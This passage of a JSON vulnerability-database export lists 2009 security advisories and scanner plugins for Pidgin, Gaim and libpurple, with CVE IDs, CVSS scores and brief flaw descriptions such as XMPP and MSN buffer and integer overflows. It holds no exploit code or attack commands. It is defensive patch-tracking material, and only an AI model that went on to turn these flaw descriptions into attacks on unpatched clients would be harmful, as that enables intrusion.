(CVE-2009-1373)\n\n - A buffer overflow issue in the 'decrypt_out()' function can be exploited through specially crafted 'QQ' packets.\n (CVE-2009-1374)\n\n - A buffer maintained by PurpleCircBuffer which is used by XMPP and Sametime protocol plugins can be corrupted if it's exactly full and then more bytes are added to it.\n (CVE-2009-1375)\n\n - An integer-overflow issue exists in the application due to an incorrect typecasting of 'int64' to 'size_t'.\n (CVE-2009-1376)", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=38866", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-29T13:41:20"}, {"id": "CENTOS_RHSA-2009-1218.NASL", "type": "nessus", "title": "CentOS 3 / 5 : pidgin (CESA-2009:1218)", "description": "Updated pidgin packages that fix a security issue are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple accounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's MSN protocol handler. If a user received a malicious MSN message, it was possible to execute arbitrary code with the permissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve this issue. 
Pidgin must be restarted for this update to take effect.", "published": "2009-08-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40625", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "lastseen": "2017-10-29T13:34:35"}, {"id": "SUSE_11_1_FINCH-090708.NASL", "type": "nessus", "title": "openSUSE Security Update : finch (finch-1088)", "description": "Several bugfixes were done for the Instant Messenger Pidgin :\n\n - Malformed responses to file transfers could cause a buffer overflow in pidgin (CVE-2009-1373) and specially crafted packets could crash it (CVE-2009-1375).\n\n - The fix against integer overflows in the msn protocol handling was incomplete (CVE-2009-1376).\n\n - Fixed misparsing ICQ message as SMS DoS (CVE-2009-1889, Pidgin#9483).\n\nAlso the Yahoo IM protocol was made to work again.", "published": "2009-07-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=40338", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1889", "CVE-2009-1373"], "lastseen": "2017-10-29T13:34:30"}, {"id": "FREEBSD_PKG_B1CA65E65AAF11DEBC9B0030843D3802.NASL", "type": "nessus", "title": "FreeBSD : pidgin -- multiple vulnerabilities (b1ca65e6-5aaf-11de-bc9b-0030843d3802)", "description": "Secunia reports :\n\nSome vulnerabilities and weaknesses have been reported in Pidgin, which can be exploited by malicious people to cause a DoS or to potentially compromise a user's system.\n\nA truncation error in the processing of MSN SLP messages can be exploited to cause a buffer overflow.\n\nA boundary error in the XMPP SOCKS5 'bytestream' server when initiating an outgoing file transfer can be exploited to cause a buffer overflow.\n\nA boundary error exists in the implementation of the 
'PurpleCircBuffer' structure. This can be exploited to corrupt memory and cause a crash via specially crafted XMPP or Sametime packets.\n\nA boundary error in the 'decrypt_out()' function can be exploited to cause a stack-based buffer overflow with 8 bytes and crash the application via a specially crafted QQ packet.", "published": "2009-06-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=39426", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-29T13:43:27"}], "openvas": [{"id": "OPENVAS:64176", "type": "openvas", "title": "Ubuntu USN-781-2 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory USN-781-2.", "published": "2009-06-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64176", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-12-04T11:28:11"}, {"id": "OPENVAS:136141256231064784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064784", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2018-04-06T11:37:12"}, {"id": "OPENVAS:64784", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": 
"http://plugins.openvas.org/nasl.php?oid=64784", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2017-07-02T21:13:46"}, {"id": "OPENVAS:64753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64753", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2017-07-24T12:56:09"}, {"id": "OPENVAS:1361412562310880734", "type": "openvas", "title": "CentOS Update for pidgin CESA-2009:1059 centos3 i386", "description": "Check for the Version of pidgin", "published": "2011-08-09T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880734", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-09T11:36:55"}, {"id": "OPENVAS:64286", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:140 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory MDVSA-2009:140.", "published": "2009-06-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=64286", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-07-24T12:57:08"}, {"id": "OPENVAS:136141256231064753", "type": "openvas", "title": "Debian Security Advisory DSA 1870-1 (pidgin)", "description": "The remote host is missing an update to pidgin\nannounced via advisory DSA 1870-1.", "published": "2009-09-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": 
"http://plugins.openvas.org/nasl.php?oid=136141256231064753", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "lastseen": "2018-04-06T11:37:36"}, {"id": "OPENVAS:136141256231064019", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1059", "description": "The remote host is missing updates to Pidgin announced in\nadvisory RHSA-2009:1059.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. 
Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064019", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:37:57"}, {"id": "OPENVAS:136141256231064286", "type": "openvas", "title": "Mandrake Security Advisory MDVSA-2009:140 (gaim)", "description": "The remote host is missing an update to gaim\nannounced via advisory MDVSA-2009:140.", "published": "2009-06-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064286", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:40:23"}, {"id": "OPENVAS:136141256231064051", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1059 (pidgin)", "description": "The remote host is missing updates to pidgin announced in\nadvisory CESA-2009:1059.", "published": "2009-05-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064051", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-04-06T11:37:22"}], "ubuntu": [{"id": "USN-781-2", "type": "ubuntu", "title": "Gaim vulnerabilities", "description": "It was discovered that Gaim did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Gaim to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Gaim did not properly handle certain malformed messages in the MSN protocol handler. 
A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/781-2/", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2018-03-29T18:19:59"}, {"id": "USN-781-1", "type": "ubuntu", "title": "Pidgin vulnerabilities", "description": "It was discovered that Pidgin did not properly handle certain malformed messages when sending a file using the XMPP protocol handler. If a user were tricked into sending a file, a remote attacker could send a specially crafted response and cause Pidgin to crash, or possibly execute arbitrary code with user privileges. (CVE-2009-1373)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the QQ protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash. This issue only affected Ubuntu 8.10 and 9.04. (CVE-2009-1374)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the XMPP and Sametime protocol handlers. A remote attacker could send a specially crafted message and cause Pidgin to crash. (CVE-2009-1375)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. 
(CVE-2009-1376)", "published": "2009-06-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/781-1/", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2018-03-29T18:20:25"}, {"id": "USN-886-1", "type": "ubuntu", "title": "Pidgin vulnerabilities", "description": "It was discovered that Pidgin did not properly handle certain topic messages in the IRC protocol handler. If a user were tricked into connecting to a malicious IRC server, an attacker could cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-2703)\n\nIt was discovered that Pidgin did not properly enforce the \u201crequire TLS/SSL\u201d setting when connecting to certain older Jabber servers. If a remote attacker were able to perform a man-in-the-middle attack, this flaw could be exploited to view sensitive information. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3026)\n\nIt was discovered that Pidgin did not properly handle certain SLP invite messages in the MSN protocol handler. A remote attacker could send a specially crafted invite message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.04 LTS, Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3083)\n\nIt was discovered that Pidgin did not properly handle certain errors in the XMPP protocol handler. A remote attacker could send a specially crafted message and cause Pidgin to crash, leading to a denial of service. This issue only affected Ubuntu 8.10 and Ubuntu 9.04. (CVE-2009-3085)\n\nIt was discovered that Pidgin did not properly handle malformed contact-list data in the OSCAR protocol handler. A remote attacker could send specially crafted contact-list data and cause Pidgin to crash, leading to a denial of service. 
(CVE-2009-3615)\n\nIt was discovered that Pidgin did not properly handle custom smiley requests in the MSN protocol handler. A remote attacker could send a specially crafted filename in a custom smiley request and obtain arbitrary files via directory traversal. This issue only affected Ubuntu 8.10, Ubuntu 9.04 and Ubuntu 9.10. (CVE-2010-0013)\n\nPidgin for Ubuntu 8.04 LTS was also updated to fix connection issues with the MSN protocol.\n\nUSN-675-1 and USN-781-1 provided updated Pidgin packages to fix multiple security vulnerabilities in Ubuntu 8.04 LTS. The security patches to fix CVE-2008-2955 and CVE-2009-1376 were incomplete. This update corrects the problem. Original advisory details:\n\nIt was discovered that Pidgin did not properly handle file transfers containing a long filename and special characters in the MSN protocol handler. A remote attacker could send a specially crafted filename in a file transfer request and cause Pidgin to crash, leading to a denial of service. (CVE-2008-2955)\n\nIt was discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges. (CVE-2009-1376)", "published": "2010-01-18T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/886-1/", "cvelist": ["CVE-2009-3085", "CVE-2009-3083", "CVE-2009-1376", "CVE-2009-3026", "CVE-2010-0013", "CVE-2009-2703", "CVE-2009-3615", "CVE-2008-2955"], "lastseen": "2018-03-29T18:19:46"}, {"id": "USN-820-1", "type": "ubuntu", "title": "Pidgin vulnerability", "description": "Federico Muttis discovered that Pidgin did not properly handle certain malformed messages in the MSN protocol handler. 
A remote attacker could send a specially crafted message and possibly execute arbitrary code with user privileges.", "published": "2009-08-20T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://usn.ubuntu.com/820-1/", "cvelist": ["CVE-2009-2694"], "lastseen": "2018-03-29T18:20:48"}], "oraclelinux": [{"id": "ELSA-2009-1059", "type": "oraclelinux", "title": "pidgin security update", "description": "[1.5.1-3]\n- CVE-2009-1373\n- CVE-2009-1376 ", "published": "2009-05-22T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1059.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2016-09-04T11:17:07"}, {"id": "ELSA-2009-1060", "type": "oraclelinux", "title": "pidgin security update", "description": "[2.5.5-2]\n- Security/DoS fixes from 2.5.6\n CVE-2009-1373-8331e31a\n CVE-2009-1374-ad057b75\n 2c9a1153\n CVE-2009-1375-7829ec76\n CVE-2009-1376-9dd1c4c3 ", "published": "2009-05-26T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1060.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2016-09-04T11:16:38"}, {"id": "ELSA-2009-1218", "type": "oraclelinux", "title": "pidgin security update", "description": " \n[2.5.9-1]\r\n- CVE-2009-2694 ", "published": "2009-08-18T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1218.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2016-09-04T11:16:03"}, {"id": "ELSA-2009-1453", "type": "oraclelinux", "title": "pidgin security update", "description": "[2.6.2-2]\n- Upstream backports:\n 97e003ed2bc2bafbb993693c9ae9c6d667731cc1 aim-buddy-status-grab\n 
37aa00d044431100d37466517568640cb082680c yahoo-buddy-idle-time\n 40005b889ee276fbcd0a4e886a68d8a8cce45698 yahoo-status-change-away\n cb46b045aa6e927a3814d9053c2b1c0f08d6fa62 crash-validate-jid\n[2.6.2-1.1]\n- VV support needs to be explicitly disabled on F10\n[2.6.2-1]\n- 2.6.2 Fixes a number of crashes\n- CVE-2009-2703, CVE-2009-3083, CVE-2009-3084, CVE-2009-3085\n[2.6.1-1]\n- 2.6.1: Fix a crash when some users send you a link in a Yahoo IM\n[2.6.0-1]\n- CVE-2009-2694\n- Voice and Video support via farsight2 (Fedora 11+)\n- Numerous other bug fixes\n[2.6.0-0.11.20090812]\n- new snapshot at the request of maiku\n[2.6.0-0.10.20090806]\n- new snapshot - theoretically better sound quality in voice chat\n[2.6.0-0.9.20090804]\n- new snapshot\n[2.6.0-0.8.20090727]\n- new snapshot\n[2.6.0-0.6.20090721]\n- Prevent main libpurple & pidgin packages depending on perl (#513902)\n[2.6.0-0.5.20090721]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n[2.6.0-0.4.20090721]\n- rebuild\n[2.6.0-0.3.20090721]\n- prevent crash with no camera when closing vv window\n[2.6.0-0.1.20090721]\n- 2.6.0 snapshot with voice and video support via farsight2\n[2.5.8-2]\n- Backport patch from upstream to enable NSS to recognize root CA\n certificates that use MD2 & MD4 algorithms in their signature, as\n used by some MSN and XMPP servers ", "published": "2009-09-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://linux.oracle.com/errata/ELSA-2009-1453.html", "cvelist": ["CVE-2009-3084", "CVE-2009-3085", "CVE-2009-3083", "CVE-2009-3026", "CVE-2009-2703", "CVE-2009-2694"], "lastseen": "2016-09-04T11:15:58"}], "centos": [{"id": "CESA-2009:1059", "type": "centos", "title": "pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1059\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA 
buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. 
Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015889.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015890.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015933.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015935.html\n\n**Affected packages:**\npidgin\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1059.html", "published": "2009-05-22T15:04:17", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015889.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1373"], "lastseen": "2017-10-03T18:25:12"}, {"id": "CESA-2009:1060", "type": "centos", "title": "finch, libpurple, pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1060\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. 
This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015891.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015892.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-May/015937.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1060.html", "published": "2009-05-22T22:24:35", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-May/015891.html", "cvelist": ["CVE-2009-1376", "CVE-2009-1375", "CVE-2009-1374", "CVE-2009-1373"], "lastseen": "2017-10-03T18:26:08"}, {"id": "CESA-2009:1218", "type": "centos", "title": "finch, libpurple, pidgin security update", "description": "**CentOS Errata and Security Advisory** CESA-2009:1218\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core 
Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016099.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016100.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016101.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-August/016102.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1218.html", "published": "2009-08-18T20:24:05", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://lists.centos.org/pipermail/centos-announce/2009-August/016099.html", "cvelist": ["CVE-2009-2694"], "lastseen": "2017-10-03T18:24:59"}], "redhat": [{"id": "RHSA-2009:1059", "type": "redhat", "title": "(RHSA-2009:1059) Important: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). 
If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-22T04:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1059", "cvelist": ["CVE-2009-1373", "CVE-2009-1376"], "lastseen": "2017-08-01T10:58:02"}, {"id": "RHSA-2009:1060", "type": "redhat", "title": "(RHSA-2009:1060) Important: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. 
This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "published": "2009-05-22T04:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://access.redhat.com/errata/RHSA-2009:1060", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "lastseen": "2017-09-09T07:20:07"}, {"id": "RHSA-2009:1218", "type": "redhat", "title": "(RHSA-2009:1218) Critical: pidgin security update", "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. 
